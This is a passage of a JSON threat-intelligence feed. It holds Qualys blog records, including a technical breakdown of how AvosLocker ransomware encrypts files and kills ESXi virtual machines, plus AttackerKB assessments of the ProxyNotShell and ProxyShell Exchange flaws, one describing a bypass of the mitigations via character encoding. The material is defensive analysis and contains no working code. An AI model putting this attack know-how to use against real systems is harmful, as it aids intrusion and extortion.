"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T23:25:55", "type": "qualysblog", "title": "Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T23:25:55", "id": "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T04:05:53", "description": "Welcome to the third edition of the Qualys Research Team\u2019s \u201cThreat Research Thursday\u201d, where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. Feedback on our second edition, [Qualys Threat Research Thursday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/29/qualys-threat-research-thursday>), is more than welcome. We would love to hear from you! \n\n\n\n## From the Qualys Blog \n\nHere is a roundup of the most interesting blogs from the Qualys Research Team over the past couple of weeks: \n\n * [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) \u2013 How do you detect the ProxyNotShell vulnerability that was released a month ago? This blog talks about all of this and more. Definitely worth a look since no official patches are available as of today! \n * [Leeloo Multipath: Authorization bypass and symlink attack in multipathd (CVE-2022-41974 and CVE-2022-41973)](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/25/leeloo-multipath-authorization-bypass-and-symlink-attack-in-multipathd-cve-2022-41974-and-cve-2022-41973>) \u2013 Fresh from the Qualys Research Team! Read more about our indigenous research in discovering these vulnerabilities affecting the `multipathd` daemon.\n * [Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/27/text4shell-detect-prioritize-and-remediate-the-risk-across-on-premise-cloud-container-environment-using-qualys-platform>) - All the details for detecting, prioritizing and remediating the Text4Shell vulnerability can be found in this post.\n\n## New Tools & Techniques \n\n**ScubaGear** \u2013 This assessment tool was developed by CISA. It verifies that an M365 tenant\u2019s configuration conforms to the policies described in the SCuBA Minimum Viable Secure Configuration Baseline documents. Currently, available baseline documents cater to Hybrid Azure Active Directory (AD), Microsoft 365 Defender, Microsoft Exchange Online, OneDrive for Business, Power BI, the Microsoft Power Platform, SharePoint Online and Microsoft Teams. ScubaGear v0.1.0 source can be [found on GitHub](<https://github.com/cisagov/ScubaGear>). \n\n**RustHound** \u2013 This cross-platform active directory collector for BloodHound is written in Rust. It will work on Linux, Windows, or MacOS. Though not all features from SharpHound are implemented yet, it is worthwhile to get this into our detection engineering cycles so that effective detections can be developed. [Check out the GitHub project](<https://github.com/OPENCYBER-FR/RustHound>). \n\n**WinDbg** \u2013 I know, I know! WinDbg is old. But the latest version of the WinDbg Preview debugger is now available with regex search and restricted mode support. [Check out WinDbg 1.2107.13001.0](<https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86>). \n\n**Sysmon - **This release fixes and adds a new Windows Event ID 28 for FileBlockShredding, which is generated when Sysmon detects and blocks file shredding from tools such as SDelete. [Download Sysmon v14.1](<https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon>). \n\n**SockFuzzer \u2013 **This is an all-in-one network syscall fuzzer for XNU. It helps you fuzz the network stack on macOS and Linux-based hosts in userland. Check [it out here](<https://github.com/googleprojectzero/SockFuzzer>). \n\n**SharpEfsPotato** - This is a neat demonstration of local privilege escalation from SeImpersonatePrivilege using Encrypting File System Remote (EFSRPC) Protocol. This combines two different projects - SweetPotato and SharpSystemTriggers/SharpEfsTrigger. Read more on [SharpEfsPotato](<https://github.com/bugch3ck/SharpEfsPotato>). \n\n**TokenMan** \u2013 This new and open-source token manipulation tool will help you in post-exploitation activities when working with Azure Active Directory \u2013 especially useful when you have a Family of Client ID (FOCI) access. Download [the tool here](<https://github.com/secureworks/TokenMan>). \n\n## New Vulnerabilities\n\n**CVE-2022-41040, CVE-2022-41082** \u2013 aka ProxyNotShell! Mitigations are available for these 0day vulnerabilities. They apply to Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. Limited, targeted attacks are still being seen in the wild for these server-side request forgery (SSRF) and remote code execution (RCE) vulnerabilities. Read more on the [Microsoft Customer Guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) page. Qualys customers can scan for QID 50122 and find vulnerable and unpatched Microsoft Exchange systems in their environment. \n\n**CVE-2022-41352 **\u2013 This publicly exploited vulnerability affecting Zimbra Collaboration (ZCS) 8.8.15 and 9.0, allows a remote attacker to gain incorrect access to any other user accounts. Qualys VMDR customers can keep a look out for QID 377618 in their reports and identify vulnerable installations. It is recommended that affected customers update to ZCS 9.0.0 Patch 27 or ZCS 8.8.15 Patch 34. More information about this can be [found here](<https://wiki.zimbra.com/wiki/Security_Center>). \n\n**CVE-2022-40684 \u2013 **This Fortinet authentication bypass vulnerability allows threat attackers to log in as an administrator on affected FortiOS, FortiProxy, and FortiSwitchManager products. A simple HTTP packet to the administrative interface is enough to compromise an affected device. Qualys VMDR and WAS QIDS - 150585, 730623, 43921 should get you started with finding vulnerable systems in your environment. Follow it up by patching up the vulnerability as mentioned in this [vendor-published advisory](<https://www.fortiguard.com/psirt/FG-IR-22-377>). Reminder \u2013 a PoC exploiting this vulnerability is already out in the wild. \n\n## Noteworthy Mentions \n\nQualys Threat Research Team contributed to the October 25, 2022 release of **MITRE ATT&CK v12**! Our contribution from [Defending Against Scheduled Task Attacks in Windows Environments](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments>) was cited under [T1053.005](<https://attack.mitre.org/techniques/T1053/005/>). This release introduces \u201cCampaigns\u201d, where adversary activity conducted over a specific period on common targets are grouped together. This version of ATT&CK for Enterprise contains 14 Tactics, 193 Techniques, 401 Sub-techniques, 135 Groups, 14 Campaigns, and 718 Pieces of Software. [Read more here](<https://attack.mitre.org/resources/updates/updates-october-2022/>). \n\nWe also contributed to the awesome and open-source **Atomic Red Team** framework. Examples are [Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-22---disable-uac-admin-consent-prompt-via-consentpromptbehavioradmin-registry-key>) and [Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md#atomic-test-2---configure-legalnoticecaption-and-legalnoticetext-registry-keys-to-display-ransom-message>) by our Senior Engineer, Threat Research - [Harshal](<https://blog.qualys.com/author/htupsamudre>). \n\n## Threat Thursdays Webinar \n\nIf you missed last month's [Threat Thursday](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) monthly webinar where the Qualys Threat Research Team presented an in-depth analysis of AsyncRAT, you could watch on-demand at the link below. \n\n[Watch Now](<https://gateway.on24.com/wcc/eh/3347108/lp/3987473/qualys_research_team_threat_thursdays_october_2022/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-28T00:58:53", "type": "qualysblog", "title": "Qualys Research Team: Threat Thursdays, October 2022", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082", "CVE-2022-41352", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-10-28T00:58:53", "id": "QUALYSBLOG:69FF0F583C65CD2D1EB59914BE41A705", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker Ransomware in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption, process files are appended with the ".avos" extension. An updated variant appends with the extension ".avos2". Similarly, the Linux version appends with the extension ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the Threats Actors of AvosLocker ransomware groups are exploiting Microsoft Exchange Server vulnerabilities using Proxyshell, compromising the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of Command-Line Options.\n\nFig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or control over the concurrent number of threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB share. It runs 200 threads concurrently of its file encryption routine.\n\nFig. 2: Execution with Default Parameter\n\nWhile execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are kept in the XOR encrypted format. The decryption routines are similar, only registers and keys are different (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command line options provided while launching the application (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running or not to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the below APIs to create multiple instances of worker threads into memory and share file paths among multiple threads. Smartly utilizing the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using API WNetOpenEnum() and WnetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting the file for encryption, it checks for file attributes and skips it if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files from encryption if its extension gets matched with one of the extensions shown in figure 11.\n\nFig. 11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file with Base64 encoded format.\n\nFig.15: Encryption Related Information\n\nThen it appends the "avo2" extension to the file using MoveFileWithprogressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended "avos2" extensions.\n\nFig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encryption of the file.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the user to not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key to decrypt the application or files.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned on the ransom note to AvosLocker's website (fig. 19), the victim will be redirected to the "payment" page.\n\nFig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux & ESXi.\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\nFig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\nFig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\nFig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\nFig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution \n(T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact \n(T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery \n(T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-16T11:21:49", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 10, 2023 2:58pm UTC reported:\n\nCVE-2022-41082, also known as ProxyNotShell is an authenticated RCE in Microsoft Exchange. ProxyNotShell actually combines CVE-2022-41082 and CVE-2022-41040 for the whole attack chain. This CVE specifically however is the RCE component. The vulnerability is a deserialization flaw in Microsoft Exchange\u2019s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as CVE-2022-41040. The deserialization gadget was documented by ZDI in their [blog](<https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend>). While this vulnerability affected Exchange Server 2013 and Exchange Server 2016, the gadget chain only worked with Exchange Server 2019 (version 15.2+). A new gadget chain could potentially be developed to exploit these older versions.\n\nGTSC originally announced on September 28th that they had seen a new (at the time) 0-day attack against their customers using Microsoft Exchange. On November 8th, Microsoft released patches for the two vulnerabilities. Between September 28th and November, no public exploits combined the SSRF with the RCE. Private threat actors however were attempting to exploit the vulnerability which led Microsoft to issue Exchange Emergency Mitigation Service (EEMS) mitigations. These mitigations took the form of IIS rewrite rules which were able to be bypassed using encoding techniques. The last issued EEMS mitigation was able to be successfully bypassed by using IBM037v1 encoding, which can be demonstrated using the [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/17275>).\n\nSuccessful code execution results in OS commands running as NT AUTHORITY\\SYSTEM. The exploit is reliable to exploit and pretty quick (compared to ProxyShell which needed to gather a lot of information).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41082", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-08T00:00:00", "id": "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "href": "https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-19T18:17:54", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T00:00:00", "id": "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "href": "https://attackerkb.com/topics/jd9xHGqW3a/cve-2022-41040", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T23:21:43", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 10, 2023 3:53pm UTC reported:\n\nThis is an alternative method for bypassing Exchange Emergency Mitigation Service (EEMS) protections for the ProxyNotShell exploit chain. When this CVE is combined with [CVE-2022-41082](<https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082>), they yield code execution as NT AUTHORITY\\SYSTEM.\n\nInstalling the original patches from Microsoft that were released in November fix this exploit chain as well. The technique is arguably redundant when EEMS can be bypassed using various encoding techniques. This alternative vector is likely most valuable when used to avoid generating exploitation following the original pattern.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-41080", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-07-11T00:00:00", "id": "AKB:3A0452AA-1A50-41D3-943C-085C00734C11", "href": "https://attackerkb.com/topics/C0uaKiuXUX/cve-2022-41080", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T23:18:13", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 14, 2021 7:15pm UTC reported:\n\nThis remote code execution (RCE) vulnerability affects Microsoft Exchange Server 2013/ CU23/2016 CU20/2016 CU21/2019 CU10. \nAnd according to FireEye exploit code is available. \nI will share more information once MSFT releases more details\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-31206", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-21T00:00:00", "id": "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "href": "https://attackerkb.com/topics/oAhIZujU2O/cve-2021-31206", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:21:09", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 14, 2021 5:15pm UTC reported:\n\nFrom <https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html> there was a note that this vulnerability seems to have been used in some Exchange Server APT attacks detailed at <https://blog.talosintelligence.com/2021/03/hafnium-update.html> however it wasn\u2019t disclosed that this vulnerability was patched despite being patched back in April 2021. Since this was under active exploitation it is recommended to patch this vulnerability if you haven\u2019t applied April 2021\u2019s patch updates already.\n\nSuccessful exploitation will result in RCE on affected Exchange Servers, and requires no prior user privileges, so patch this soon!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-34473", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", 